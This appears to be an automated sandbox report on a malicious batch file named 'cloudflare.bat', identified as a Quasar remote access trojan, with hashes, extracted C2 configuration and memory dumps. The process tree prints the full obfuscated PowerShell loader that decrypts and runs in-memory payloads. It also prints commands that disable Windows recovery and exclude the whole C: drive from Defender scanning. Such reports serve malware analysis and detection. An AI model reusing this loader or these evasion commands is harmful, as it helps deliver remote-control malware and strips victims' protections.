Overview

overview

10

Static

static

1

cloudflare.bat

windows7-x64

8

cloudflare.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-01-2025 19:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    cloudflare.bat

  • Size

    1.6MB

  • MD5

    d7ef2415ae2b53c9cc8d960f332b2fc2

  • SHA1

    5ee9e9075d7eff88b9b6f6640dd23b04d3d89bf8

  • SHA256

    d09f2f0f47441da499f40328373ea30f5b2fba8f75f8d84e1df54f0d39c363e8

  • SHA512

    0d0b614e2f6c25408d3e35679d41dd9a96f90b54ffd373db1e5be1809d8384370baf391b0c55c6769b730d3ca319efcc052a3ebf77cf5cfb502dac66fd2489e4

  • SSDEEP

    24576:6dbChi2BlJAy2y618+L24nMTz0ZpAsb1EwG5M1XxWMkp2b8DU+owr4SeBlKcvREH:9i2Bl+2TzZw5XMe4DU+zrSl+v

Score
10/10
quasarexploreexecutionspywaretrojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

explore

C2

45.88.186.152:4782

Mutex

4b5ff9f7-66f8-4c52-adcb-b84eb3e09f69

Attributes
  • encryption_key

    0D83B228073938065AB8FEE60BD7542CA8D42A20

  • install_name

    Onedrive.exe

  • log_directory

    Logs

  • reconnect_delay

    300

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

    execution
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cloudflare.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:320
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8bhRsRHlVCq0oE/jC8znaXL8N3C2l4vOkUX6p5fMCBI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gSWUi9Srt/hMiTUvma/Osg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bvRls=New-Object System.IO.MemoryStream(,$param_var); $PBSCt=New-Object System.IO.MemoryStream; $pTrqw=New-Object System.IO.Compression.GZipStream($bvRls, [IO.Compression.CompressionMode]::Decompress); $pTrqw.CopyTo($PBSCt); $pTrqw.Dispose(); $bvRls.Dispose(); $PBSCt.Dispose(); $PBSCt.ToArray();}function execute_function($param_var,$param2_var){ $fcAKi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $byGGF=$fcAKi.EntryPoint; $byGGF.Invoke($null, $param2_var);}$QgxHT = 'C:\Users\Admin\AppData\Local\Temp\cloudflare.bat';$host.UI.RawUI.WindowTitle = $QgxHT;$SwrfE = [type]::GetType('System.IO.File');$OHVxV = [type]::GetType('System.Environment');$bNKIC = $SwrfE::('txeTllAdaeR'[-1..-11] -join '')($QgxHT);$BVkSS = $OHVxV::NewLine;$YddQR = $bNKIC.Split($BVkSS);$uUoiG = $YddQR;foreach ($IZmUa in $uUoiG) { if ($IZmUa.StartsWith(':: ')) { $tpTzT=$IZmUa.Substring(3); break; }}$payloads_var=[string[]]$tpTzT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4728
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" -Command "Get-Process powershell | Where-Object { $_.Id -ne 4728 } | Select-Object -ExpandProperty Id"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3508
      • C:\Windows\SYSTEM32\reagentc.exe
        "reagentc.exe" /disable
        3⤵
        • Drops file in System32 directory
        • Drops file in Windows directory
        PID:2228
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4000

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    223bd4ae02766ddc32e6145fd1a29301

    SHA1

    900cfd6526d7e33fb4039a1cc2790ea049bc2c5b

    SHA256

    1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e

    SHA512

    648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    1c6fde2dec167fbabaa0168aebc5e3ef

    SHA1

    ee72f321c123219f5c411cca491333af848512e1

    SHA256

    35076ea62c75739f2f1434d3cdde5f975e332a13210ffab2ab63a975f300fbc9

    SHA512

    59221096ca0c2311844e5a845bddc0e1050224f1c094592216654342aa90cfd4f15e72927f63412b3b1d3b1960df960dbd6a371fb3d5a113998c7bda72eb07d5

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ij3lerpf.pnc.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/3508-15-0x00007FFCD52F0000-0x00007FFCD5DB1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3508-29-0x00007FFCD52F0000-0x00007FFCD5DB1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3508-26-0x00007FFCD52F0000-0x00007FFCD5DB1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3508-25-0x00007FFCD52F0000-0x00007FFCD5DB1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4728-13-0x0000019D4B1F0000-0x0000019D4B1F8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/4728-47-0x0000019D66340000-0x0000019D66390000-memory.dmp

    Filesize

    320KB

    Download

  • memory/4728-0-0x00007FFCD52F3000-0x00007FFCD52F5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4728-12-0x00007FFCD52F0000-0x00007FFCD5DB1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4728-11-0x00007FFCD52F0000-0x00007FFCD5DB1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4728-35-0x0000019D65A20000-0x0000019D65D44000-memory.dmp

    Filesize

    3.1MB

    Download

  • memory/4728-1-0x0000019D63430000-0x0000019D63452000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4728-14-0x0000019D65720000-0x0000019D65852000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/4728-48-0x0000019D66450000-0x0000019D66502000-memory.dmp

    Filesize

    712KB

    Download

  • memory/4728-49-0x0000019D66C20000-0x0000019D66DE2000-memory.dmp

    Filesize

    1.8MB

    Download

  • memory/4728-52-0x0000019D66390000-0x0000019D663A2000-memory.dmp

    Filesize

    72KB

    Download

  • memory/4728-53-0x0000019D663F0000-0x0000019D6642C000-memory.dmp

    Filesize

    240KB

    Download

  • memory/4728-54-0x00007FFCD52F3000-0x00007FFCD52F5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4728-55-0x00007FFCD52F0000-0x00007FFCD5DB1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4728-56-0x00007FFCD52F0000-0x00007FFCD5DB1000-memory.dmp

    Filesize

    10.8MB

    Download